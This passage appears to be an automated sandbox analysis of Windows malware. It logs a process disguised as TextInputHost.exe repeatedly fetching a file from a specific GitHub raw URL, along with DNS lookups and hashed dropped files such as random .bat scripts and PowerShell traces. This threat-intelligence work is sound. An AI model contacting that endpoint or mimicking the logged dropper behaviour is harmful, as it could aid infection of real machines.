                                                          Request
                                                          48.229.111.52.in-addr.arpa
                                                          IN PTR
                                                          Response
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:17 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600029-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805097.049681,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 5a6c45b0023bc665bafbf82d07af3ef9612a7869
                                                          Expires: Sat, 21 Dec 2024 18:23:17 GMT
                                                          Source-Age: 80
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:27 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600091-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805107.080944,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 7e1397e4e67fb8b94cc4b9cf58e24bff57678968
                                                          Expires: Sat, 21 Dec 2024 18:23:27 GMT
                                                          Source-Age: 90
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:40 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600096-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805121.779691,VS0,VE3
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 42919fc3f386602bfee57c350ff8082b134bb998
                                                          Expires: Sat, 21 Dec 2024 18:23:40 GMT
                                                          Source-Age: 104
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:18:54 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600045-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 1
                                                          X-Timer: S1734805134.488869,VS0,VE1
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: 1a0c1ed1eaeed42b239508ed3d451df8624f30f0
                                                          Expires: Sat, 21 Dec 2024 18:23:54 GMT
                                                          Source-Age: 118
                                                        • flag-us
                                                          GET
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          TextInputHost.exe
                                                          Remote address:
                                                          185.199.109.133:443
                                                          Request
                                                          GET /justbio123/raven/main/api.txt HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: raw.githubusercontent.com
                                                          Connection: Keep-Alive
                                                          Response
                                                          HTTP/1.1 200 OK
                                                          Connection: keep-alive
                                                          Content-Length: 4
                                                          Cache-Control: max-age=300
                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                          Content-Type: text/plain; charset=utf-8
                                                          ETag: "e02d2a68e3127684593cad90a6339315a5353b0c3584608402c5a1bac4c9c6e4"
                                                          Strict-Transport-Security: max-age=31536000
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: deny
                                                          X-XSS-Protection: 1; mode=block
                                                          X-GitHub-Request-Id: BFDF:081B:57086:70797:6766E7BC
                                                          Accept-Ranges: bytes
                                                          Date: Sat, 21 Dec 2024 18:19:04 GMT
                                                          Via: 1.1 varnish
                                                          X-Served-By: cache-lcy-eglc8600049-LCY
                                                          X-Cache: HIT
                                                          X-Cache-Hits: 2
                                                          X-Timer: S1734805144.486051,VS0,VE0
                                                          Vary: Authorization,Accept-Encoding,Origin
                                                          Access-Control-Allow-Origin: *
                                                          Cross-Origin-Resource-Policy: cross-origin
                                                          X-Fastly-Request-ID: f265f1a02b45cba41d32cee4a8d8283e23f92515
                                                          Expires: Sat, 21 Dec 2024 18:24:04 GMT
                                                          Source-Age: 127
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          849 B
                                                          5.1kB
                                                          8
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          861 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          897 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          914 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          896 B
                                                          5.1kB
                                                          8
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          1.1kB
                                                          5.9kB
                                                          10
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          861 B
                                                          5.1kB
                                                          8
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          897 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          896 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          1.2kB
                                                          6.5kB
                                                          11
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          897 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          896 B
                                                          5.1kB
                                                          8
                                                          9

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 185.199.109.133:443
                                                          https://raw.githubusercontent.com/justbio123/raven/main/api.txt
                                                          tls, http
                                                          TextInputHost.exe
                                                          896 B
                                                          5.1kB
                                                          8
                                                          10

                                                          HTTP Request

                                                          GET https://raw.githubusercontent.com/justbio123/raven/main/api.txt

                                                          HTTP Response

                                                          200
                                                        • 8.8.8.8:53
                                                          8.8.8.8.in-addr.arpa
                                                          dns
                                                          66 B
                                                          90 B
                                                          1
                                                          1

                                                          DNS Request

                                                          8.8.8.8.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          217.106.137.52.in-addr.arpa
                                                          dns
                                                          73 B
                                                          147 B
                                                          1
                                                          1

                                                          DNS Request

                                                          217.106.137.52.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          172.214.232.199.in-addr.arpa
                                                          dns
                                                          74 B
                                                          128 B
                                                          1
                                                          1

                                                          DNS Request

                                                          172.214.232.199.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          95.221.229.192.in-addr.arpa
                                                          dns
                                                          73 B
                                                          144 B
                                                          1
                                                          1

                                                          DNS Request

                                                          95.221.229.192.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          69.31.126.40.in-addr.arpa
                                                          dns
                                                          71 B
                                                          157 B
                                                          1
                                                          1

                                                          DNS Request

                                                          69.31.126.40.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          raw.githubusercontent.com
                                                          dns
                                                          TextInputHost.exe
                                                          71 B
                                                          135 B
                                                          1
                                                          1

                                                          DNS Request

                                                          raw.githubusercontent.com

                                                          DNS Response

                                                          185.199.109.133
                                                          185.199.110.133
                                                          185.199.108.133
                                                          185.199.111.133

                                                        • 8.8.8.8:53
                                                          133.109.199.185.in-addr.arpa
                                                          dns
                                                          74 B
                                                          118 B
                                                          1
                                                          1

                                                          DNS Request

                                                          133.109.199.185.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          149.220.183.52.in-addr.arpa
                                                          dns
                                                          73 B
                                                          147 B
                                                          1
                                                          1

                                                          DNS Request

                                                          149.220.183.52.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          56.163.245.4.in-addr.arpa
                                                          dns
                                                          71 B
                                                          157 B
                                                          1
                                                          1

                                                          DNS Request

                                                          56.163.245.4.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          198.187.3.20.in-addr.arpa
                                                          dns
                                                          71 B
                                                          157 B
                                                          1
                                                          1

                                                          DNS Request

                                                          198.187.3.20.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          172.210.232.199.in-addr.arpa
                                                          dns
                                                          74 B
                                                          128 B
                                                          1
                                                          1

                                                          DNS Request

                                                          172.210.232.199.in-addr.arpa

                                                        • 8.8.8.8:53
                                                          48.229.111.52.in-addr.arpa
                                                          dns
                                                          72 B
                                                          158 B
                                                          1
                                                          1

                                                          DNS Request

                                                          48.229.111.52.in-addr.arpa

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DllCommonsvc.exe.log

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          7f3c0ae41f0d9ae10a8985a2c327b8fb

                                                          SHA1

                                                          d58622bf6b5071beacf3b35bb505bde2000983e3

                                                          SHA256

                                                          519fceae4d0dd4d09edd1b81bcdfa8aeab4b59eee77a4cd4b6295ce8e591a900

                                                          SHA512

                                                          8a8fd17eef071f86e672cba0d8fc2cfed6118aff816100b9d7c06eb96443c04c04bc5692259c8d7ecb1563e877921939c61726605af4f969e3f586f0913ed125

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TextInputHost.exe.log

                                                          Filesize

                                                          1KB

                                                          MD5

                                                          baf55b95da4a601229647f25dad12878

                                                          SHA1

                                                          abc16954ebfd213733c4493fc1910164d825cac8

                                                          SHA256

                                                          ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                          SHA512

                                                          24f502fedb1a305d0d7b08857ffc1db9b2359ff34e06d5748ecc84e35c985f29a20d9f0a533bea32d234ab37097ec0481620c63b14ac89b280e75e14d19fd545

                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                          Filesize

                                                          2KB

                                                          MD5

                                                          d85ba6ff808d9e5444a4b369f5bc2730

                                                          SHA1

                                                          31aa9d96590fff6981b315e0b391b575e4c0804a

                                                          SHA256

                                                          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                          SHA512

                                                          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          c86ac3c1bf032c09c871b58e4f257db0

                                                          SHA1

                                                          915800e8ba0bbbe2fc6b8f4390f265373013fca6

                                                          SHA256

                                                          6fd214d717629205040f2bd02607b0be2b83a34fedb2019d202ba327a6e03d05

                                                          SHA512

                                                          be64910fa87861b728334762f95afb5ced93b4ee4f0736ce288e37840333e1674a25d2e8c57f0bbbeac432359ce9a89fffb1a5bfd1895c243337aa4889867f09

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          3c625954a51c4bbd8141206b00f6fc0a

                                                          SHA1

                                                          4128cb2f9d2984844e303e2e330e448334e5c273

                                                          SHA256

                                                          952515feb4929cfad2435c679a5fad19242e938e8a7c97afebb1f3d996bd3ec4

                                                          SHA512

                                                          3f7c4ea0551de5b6237ca13419413e6e73e85632e9bb09b5354d6310b5969f9c3a2dc27142e75e8572c2c65b2bc7615269fad27dcea2f91c389b6758e2630517

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          01841b4277227c0578c89131444e7d57

                                                          SHA1

                                                          b00fbb6cabb5d09d50c28c0fdc62e5e6917b0c5d

                                                          SHA256

                                                          34797c2cafe0d94ea265e6aba8e38c3c34532e125bdd6dc8c1eab16a977a8cfa

                                                          SHA512

                                                          15c656ce162ff535506f9f22d285355576e53b89baebc1064523ab59f2eccb111cdd71c1fd66e59995d0727993bd268c976a9bd6cd78ff78d19a3c13436f0497

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          aba273eeba4876ea41ee0e64b4cbb51d

                                                          SHA1

                                                          bef5f75b81cf27268dc0d0f30f00b022f9288db9

                                                          SHA256

                                                          67fc3f5c3407858793c6fac6131b0f340667ffc567fa76b43245ecf2621322c9

                                                          SHA512

                                                          23dc2f0cfc68194dcbf407a6528cf9f9a8aa89f4821be22413bde036ae5ca44144b568aa3160372b9741f3d0f5baa48dff8a8b582bdedc3ad3fb121af340c0ae

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          b740f7616c3c3d006afd7e1586758eeb

                                                          SHA1

                                                          c465af4c07ecb9e3de239c410d3b2ed5de93cdde

                                                          SHA256

                                                          c11b84252afa74e4f323fcbae853cb45217a65d70ac44dea182f9ec872bd9872

                                                          SHA512

                                                          d4dd7531d48a9f6d6432fe0d55cefc76139566c54514ba722d76e5bd4371bfca0e491939795883de21901eac98b1af7236ea83281a7dde8befe16719993f185e

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          58d5391a088420e4f58d801ed9f217a6

                                                          SHA1

                                                          3a9795e248a126b315449549980768729ac2d517

                                                          SHA256

                                                          5bfe4b5e9492f71d0f90fd6db10ac170c0aaaa932ebc5da9a30b80ab47a6d51f

                                                          SHA512

                                                          e650e3e9102f9200780215a596549b030fca83433d6fb2e5ecd6bdcc561826a673a83fa75694fb689a1dcd6b049d2fcae324b9dc9bfcd3fcced4f74326a04943

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          17ea263ce8c38396c330fd30047d0522

                                                          SHA1

                                                          65304731eecbe75dd17c1bafbcc48dbf25e17eb7

                                                          SHA256

                                                          e82e800314f4323137889614c5094bd5005946be034263b84ca957a992b099e8

                                                          SHA512

                                                          0799a50c0c6fe5eeca124395e57b38da73ae57554fa0063beb720bba8116e256f91f86c9138e452541e1672b349a4eb4154b3787dda67d481a6f67c97c336eba

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          f744cd7aaf7746b659b70728f3172e24

                                                          SHA1

                                                          cbd6215e6f9416d2bcd48e6e9f56618c48fbbd00

                                                          SHA256

                                                          917a1e7bd5e754048e17c20e320bc5f06644c7292e7c38334743dcb50e3aec15

                                                          SHA512

                                                          394f71c4674543f74bef27b0314f997052a1ce0113ce923c4303ea81319995184a55e8582d163bd163b0723e7beb2596f01a6e9e875f11568f117b0218f64fe0

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          6b4e39689cee6c9a38f5a03b68b3df72

                                                          SHA1

                                                          af6cc92ac1532a1059151831885c2929d83f8107

                                                          SHA256

                                                          01bd20c1140847c1d579ca92531850535e5b0aaddfce3c8648716dc1cb811f8d

                                                          SHA512

                                                          9fb0e8c8ebd43525f8364eff0d18c02a34c044d14558cfbea351d283f03df9b84e3e32453e296b2cd844b785dcefef75adfeaff401d80462959104033fe7ba02

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          ee02cdcb025f6203e04573a984c71fbe

                                                          SHA1

                                                          1774451134cd51ae4523770e0477986c5a9efc2e

                                                          SHA256

                                                          bc6a014548dc12c82211b19a3ac9394146c52cd0e12e9f3351940037376a092f

                                                          SHA512

                                                          64f1206ec3c3379f9a2adb043e7abf8aeb3f9d3f052c7f398b5aea8ca65843bcd6a21e741545d807a4f78278c71492c3c612102e6853340ee8fdf5931b9c3765

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          2262839c93970e05099a4a7d8d6bf51b

                                                          SHA1

                                                          5bdc2124f4d84180ab974594fc5d0acce89e02bc

                                                          SHA256

                                                          df5987de92b53918f66a554e5599a52da01e174b13cd27ac4ba9b12e5b402a65

                                                          SHA512

                                                          b2c74af14d5f73122c881a2e3e8e94df5c38bc116c837052e21384a3b20167d7746a86680ce88b22e477117924b2fba5d4748135dbd96448e85b77c8bdaf9e1a

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          6d42b6da621e8df5674e26b799c8e2aa

                                                          SHA1

                                                          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                          SHA256

                                                          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                          SHA512

                                                          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                          Filesize

                                                          944B

                                                          MD5

                                                          77d622bb1a5b250869a3238b9bc1402b

                                                          SHA1

                                                          d47f4003c2554b9dfc4c16f22460b331886b191b

                                                          SHA256

                                                          f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                          SHA512

                                                          d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                        • C:\Users\Admin\AppData\Local\Temp\12JaEZR6zX.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          6fea7a4a345024980d9a3273cb04ca3a

                                                          SHA1

                                                          f0c79ca7fc28e4b47d39589b4d8b8cabe0aff0f2

                                                          SHA256

                                                          d7323463d50e1d501c73439eef777f8c6a79bf3ebf0c8ce8c58291d118c8f092

                                                          SHA512

                                                          45c611802c3dd58065fe69fd01c844b5c6c1875a0b85ec597a93cc941c011a63c2c277bd8683d422a1c371a384723d7d3f3a3d288644734a5b1f57a49b02536b

                                                        • C:\Users\Admin\AppData\Local\Temp\7lFc7N4hi3.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          f380a893940efce580da8f95248d6a0a

                                                          SHA1

                                                          db2566ed7f7021c20d51f9e1eaf04bacbed98ade

                                                          SHA256

                                                          8ebf501d91031f2795e6227712513305d014d1de8df408fb7b599ed023797ad5

                                                          SHA512

                                                          829a656895a5e18dce36a7f2cfe0ee4f470a60cbe47ecc1df35ff55fe7a88402c9a3a736b3aff70c157c1691ca8fbccfa65429ff79b1ebc16594cd6617414266

                                                        • C:\Users\Admin\AppData\Local\Temp\OTxxDhnLNa.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          1853f97027c5bc46c5b4ec9439ede065

                                                          SHA1

                                                          f74dd30a219288540e5bdbb29bad55836b7ed6a3

                                                          SHA256

                                                          d1bff599e44cdef18fc27f51cc7141d4bd286fc483402db72c4dce7a31125a62

                                                          SHA512

                                                          1580782b2bc15a8eb267251062bf833983249de3b4567444fe023ab15b95ad3acc4dc3a8daa5753707afc8ebaf2b883d9ceec599f8281624f5484e6996b3cf7c

                                                        • C:\Users\Admin\AppData\Local\Temp\SRNviAgREO.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          de1aef20d7cab2d3430625d417b1ca8a

                                                          SHA1

                                                          f6c5b5d1bfb29b3f4c423d9757d8229141412b9a

                                                          SHA256

                                                          0ad230417501660d946789fe165bfd96a4a97108a17d360fe63b4a5e94565384

                                                          SHA512

                                                          2f73706656ac82b28deaf8adac0117e48a2134415edad53df58a7bd39d1e13b848e5d13d6d71648e128a0d3f449db2594c53f0b83f9c88431bc51e7f908edd5e

                                                        • C:\Users\Admin\AppData\Local\Temp\UWW2tbEWSD.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          8a212709365cca615a1138bb80d8e0a1

                                                          SHA1

                                                          10eca1d097e501a563e24d4fed9455398a4d1a8f

                                                          SHA256

                                                          e5dbc246898f6f8e66dacde6568b4ff66f5bfc5568d2fb8f0a4cecafc2a930bf

                                                          SHA512

                                                          3128d6adc56e50c1f5b4b159c0ca674442e8cfe3b7d7989385c5ca90d9f1660ba0b5a7969f74215db90237753516c897a2349b9444f8ef478226083e524d23a0

                                                        • C:\Users\Admin\AppData\Local\Temp\XIQ15LoDrx.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          1658f24ed9fd21a255335d1a98bb8c77

                                                          SHA1

                                                          614708814e60b7f1de9f7577acaff4cab91c2237

                                                          SHA256

                                                          16b728360aa4a3535d02b9045156d972593db3b3b9baec474934d3268e208784

                                                          SHA512

                                                          0a9a1a1087caf7a157b06baf8982c5bc01e978768f72fe84daf15cef13f7c0284e06529c49527c48869ef66f017ce95ef1051bc3893a758499f43f492c610c71

                                                        • C:\Users\Admin\AppData\Local\Temp\YNa8GmLI5m.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          7fce764b9488b35e1d51eecf721831e9

                                                          SHA1

                                                          9d9d14651d6f2f3f1d0317a7d94522f3e32b6658

                                                          SHA256

                                                          cf400ff2bc63049a3e9bd49bce0db9333d91a9cf683d99efe6c491e8d97e5c62

                                                          SHA512

                                                          883838180ee6c2fe6757c07a8cbf478406935ca0e50222b5623323cb7836059b23da432fff1ea01cfd592c410a224eb5fb932d8ec1ced96a2c7904b75d442a8b

                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wjnsh53z.u1k.ps1

                                                          Filesize

                                                          60B

                                                          MD5

                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                          SHA1

                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                          SHA256

                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                          SHA512

                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                        • C:\Users\Admin\AppData\Local\Temp\dFeEewS5jL.bat

                                                          Filesize

                                                          238B

                                                          MD5

                                                          89858445bbc05b154956843b45284257

                                                          SHA1

                                                          fe5924b94a6f4a1d82af05aa0e794d73e231dae2

                                                          SHA256

